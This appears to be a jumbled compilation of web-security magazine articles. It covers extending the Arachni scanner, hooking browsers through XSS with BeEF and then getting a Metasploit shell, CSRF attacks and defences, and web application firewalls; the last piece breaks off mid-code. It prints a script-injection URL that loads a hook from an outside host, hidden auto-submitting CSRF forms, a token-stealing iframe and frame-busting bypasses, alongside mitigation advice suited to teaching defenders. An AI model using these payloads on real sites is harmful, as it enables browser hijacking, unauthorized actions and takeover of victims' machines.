If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).

After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute
  and modify this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common directories on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.

Move into your Arachni source tree. You'll find the modules directory; in there you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module.

Arachni makes it real easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.

Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.

If there is a directory that needed to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.

Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.

Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.

Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).

The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in the further scans), as well as create a report entry for it.

Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.

Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.

And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup: this demonstrates that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.

In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).

A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this too:
HTML Page
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation

Figure 2. BeEF after configuration

Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.

Figure 1. The user enters input in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).

Instead of clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit

The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).

Click and highlight the zombie in the left pane and then click on Standard Modules - Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).

So as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more

Server-Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text input, the attacker enters a snippet of JavaScript into the box, the JavaScript will execute on the user's machine instead of being displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>

The screenshot below clarifies the above steps (Figure 1).

BeEF – Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.

I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3. Connection with the BeEF controller

Figure 4. What the attacker will see

Figure 5. What the victim will see

Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.

I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.

Defacing the Current Web Page
This results in the web page being rewritten on the victim browser with the text in the DEFACE STRING box. Try it out (Figure 6).

Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).

Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser

Figure 8. Starting Metasploit

Figure 9. The jobs command

Figure 10. Metasploit after clicking Send Now

Figure 11. Meterpreter window - screenshot 1

Figure 12. Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules - Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).

Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).

If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).

Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).

The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.

Once we have control over this machine, we can use FTP or HTTP to download various other tools like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on it. We can then use these to port scan an entire internal network or search for vulnerabilities in other services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.

Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
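To make the encoding step concrete, here is a minimal Ruby sketch (Ruby is used purely for illustration; the article's sample site is PHP). The render_search_result helper is hypothetical and mirrors the vulnerable echo in search1.php, but with the user input HTML-encoded via the standard library's CGI.escapeHTML:

```ruby
require 'cgi'

# Hypothetical handler mirroring the vulnerable search page: the
# user-supplied parameter is HTML-encoded before being reflected,
# so injected markup is rendered as inert text instead of executing.
def render_search_result(user_input)
  "The parameter passed is #{CGI.escapeHTML(user_input)}"
end

puts render_search_result("<script>alert(document.domain)</script>")
```

With this in place, the <script> payload comes back as &lt;script&gt;... and is displayed by the browser rather than executed.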
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.

ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvind.doraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com

References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.

CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
style="display:none">

Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).

Useless Defenses
The following are the weak defenses:

Only accept POST: This stops simple link-based attacks (IMG, iframes, etc.), but hidden POST requests can be created within frames, scripts, etc.

Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.

Requiring multi-step transactions: CSRF attacks can perform each step in order.

Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text in the CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a

Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011

Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
  <iframe name="hiddenFrame"></iframe>
  <form name="Form" action="http://site.com/post.php"
        target="hiddenFrame"
        method="POST">
    <input type="text" name="message" value="I like www.evil.com">
    <input type="submit">
  </form>
  <script>document.Form.submit();</script>
</div>
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)

In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):

index.php (Evil website)

For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;

A browser's settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>

It consists of a conditional statement and a counter-action statement.

Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, in order to compare them after the page form is submitted.

Mechanisms used to subvert one-time tokens usually amount to brute-force attacks. Brute forcing attacks against one-time tokens are useful only if the mechanism is widely used by web developers. For example, the following PHP code:

<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
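As a point of comparison, the same issue-and-check token pattern can be sketched in Ruby. The session hash and helper names below are illustrative only (not part of any framework), and SecureRandom is used instead of md5(uniqid(rand())) because it yields a token that is infeasible to brute force:

```ruby
require 'securerandom'

# Issue a one-time token: store it in the session and return the
# value to be embedded in the form's hidden field.
def issue_token(session)
  session[:token] = SecureRandom.hex(16)  # 32 hex chars, 128 bits
end

# Verify on submission: the posted token must equal the stored copy;
# the token is deleted so it cannot be replayed (one-time use).
def valid_token?(session, posted)
  stored = session.delete(:token)
  !stored.nil? && stored == posted
end

session = {}
hidden_field_value = issue_token(session)
valid_token?(session, hidden_field_value)  # true on first use only
```

Deleting the token on verification is what makes it one-time: a second submission with the same value fails, which also defeats the token-stealing iframe trick described below if a fresh token is bound to each rendered form.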
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).

Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = "URL"
document.write('')
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.

Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>

Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>

This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006 and then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience shaped Samvel's work ethic: he started to pay attention to each line of code, for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.

References
• Cross-Site Request Forgery – https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
  <iframe src="http://good.com/index.php"></iframe>
  <form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
    <input type="text" name="message" value="I like www.bad.com">
    <input type="hidden" name="token" value="">
    <input type="submit" value="Post">
  </form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and our working lives. In order to facilitate all of these processes, a broad range of applications is required, provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.

A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of, and more powerful, applications that provide the internet user with the required functions as quickly and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried and tested technologies for developing web applications without having subjected them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby

First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
If web applications have weak spots, they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet also offers many possibilities for concealment and for making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security in the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies, in the first years of web usage in particular.
Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now, the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have started to combine these methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch the weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible in the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions in an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not just use the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
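The session-ID update mentioned above can be illustrated with a minimal Python sketch. The in-memory session store and function names are invented for illustration; the point is that regenerating the ID at login makes an ID planted by an attacker worthless.

```python
import secrets

# Hypothetical in-memory session store: session_id -> session data.
sessions = {}

def create_session():
    sid = secrets.token_hex(16)
    sessions[sid] = {"user": None, "authenticated": False}
    return sid

def login(old_sid, user):
    """On successful login, discard the pre-auth session ID and issue a
    fresh one, so an ID fixated by an attacker becomes worthless."""
    data = sessions.pop(old_sid)          # invalidate the old ID
    data.update(user=user, authenticated=True)
    new_sid = secrets.token_hex(16)
    sessions[new_sid] = data
    return new_sid

# An attacker who fixed the victim's pre-login ID cannot reuse it:
sid_before = create_session()
sid_after = login(sid_before, "alice")
assert sid_before not in sessions
assert sessions[sid_after]["authenticated"]
```

An application that stores more than authentication state in the session makes this swap harder, which is exactly why retrofitting the fix is expensive.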
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered over time, and by this time correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or as an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more safely a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF it is still advisable to check the security functions, as conducted by penetration testers. This might reveal, for example, that the system can be misused through SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is also deployed as a protective system, then this can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis. This would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
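The limitation noted above, that filtering special characters does not always stop SQL Injection, can be shown with a small hypothetical sketch (parameter names and rules invented): a numeric parameter needs no inverted commas at all to be abused, so a whitelist rule for that parameter is the safer check.

```python
def strip_quotes(value):
    # The naive WAF rule from the text: drop inverted commas.
    return value.replace("'", "")

# A numeric parameter can be abused without any quotes at all:
payload = "1 OR 1=1"
query = "SELECT * FROM orders WHERE id = " + strip_quotes(payload)
# The resulting query still contains "1 OR 1=1" - injection survives.

# A stricter, whitelist-style rule for a numeric parameter:
def is_valid_id(value):
    return value.isdigit() and len(value) <= 10

assert not is_valid_id(payload)   # the injection attempt is rejected
assert is_valid_id("42")          # a legitimate value passes
```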
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid number of characters and permitted value area.
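The parameter rules described above can be sketched in a few lines of Python. The form fields, lengths and character classes are invented for illustration; a real WAF expresses the same idea in its own rule language.

```python
import re

# Hypothetical rule set for one monitored entry form (names invented):
FORM_RULES = {
    "username": {"max_len": 32, "pattern": re.compile(r"^[A-Za-z0-9_.-]+$")},
    "zipcode":  {"max_len": 10, "pattern": re.compile(r"^[0-9 -]+$")},
}

def check_request(params):
    """Block requests with unexpected parameters, oversized values,
    or characters outside the permitted value area."""
    if set(params) - set(FORM_RULES):          # extra parameters -> block
        return False
    for name, value in params.items():
        rule = FORM_RULES[name]
        if len(value) > rule["max_len"] or not rule["pattern"].match(value):
            return False
    return True

assert check_request({"username": "alice_01", "zipcode": "94086"})
assert not check_request({"username": "a", "zipcode": "1", "extra": "x"})
assert not check_request({"username": "' OR '1'='1", "zipcode": "94086"})
```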
Of course, an integrated XML firewall should also be standard these days, because increasingly more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
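The nested-elements attack mentioned above exploits parsers that accept arbitrarily deep XML. A hypothetical depth check (the limit value is invented) might look like this sketch:

```python
import xml.etree.ElementTree as ET

MAX_DEPTH = 20  # illustrative limit; a real XML firewall makes this configurable

def depth(elem, level=1):
    # Recursively compute the nesting depth of an element tree.
    return max([depth(child, level + 1) for child in elem] + [level])

def xml_ok(payload):
    """Reject unparseable or excessively nested XML payloads."""
    try:
        root = ET.fromstring(payload)
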